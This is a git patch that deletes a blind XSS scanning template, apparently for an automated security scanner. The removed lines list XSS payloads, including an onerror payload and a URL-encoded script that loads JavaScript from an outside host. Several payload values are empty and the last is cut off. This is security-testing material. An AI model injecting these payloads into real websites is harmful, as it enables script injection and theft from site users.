From ddb7bac07bee31888803783b7fd9da3fa7932176 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 11 Jun 2024 23:15:20 +0530
Subject: [PATCH] Delete dast/vulnerabilities/xss/blind-xss.yaml
---
dast/vulnerabilities/xss/blind-xss.yaml | 64 -------------------------
1 file changed, 64 deletions(-)
delete mode 100644 dast/vulnerabilities/xss/blind-xss.yaml
diff --git a/dast/vulnerabilities/xss/blind-xss.yaml b/dast/vulnerabilities/xss/blind-xss.yaml
deleted file mode 100644
index f2d6cbc306..0000000000
--- a/dast/vulnerabilities/xss/blind-xss.yaml
+++ /dev/null
@@ -1,64 +0,0 @@
-id: blind-xss
-
-info:
- name: Blind Cross Site Scripting
- author: 0xKayala
- severity: high
- description: This template will spray blind XSS payloads into URLs. Use 'xss.report', 'bxsshunter.com', 'xsshunter.trufflesecurity.com', 'ez.pe' or 'self-hosted server' to check if the payload fired.
- tags: xss,bxss,dast
-
-variables:
- first: "{{rand_int(10000, 99999)}}"
- script_payload_1: ""
- script_payload_2: "\"><41707"
- script_payload_3: ""
- script_payload_4: ""
- script_payload_5: ""
- script_payload_6: ""
- script_payload_7: "\u0022\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e"
- script_payload_8: "%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2F0xkayala.github.io/xss-poc.js%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E"
- script_payload_9: "XX">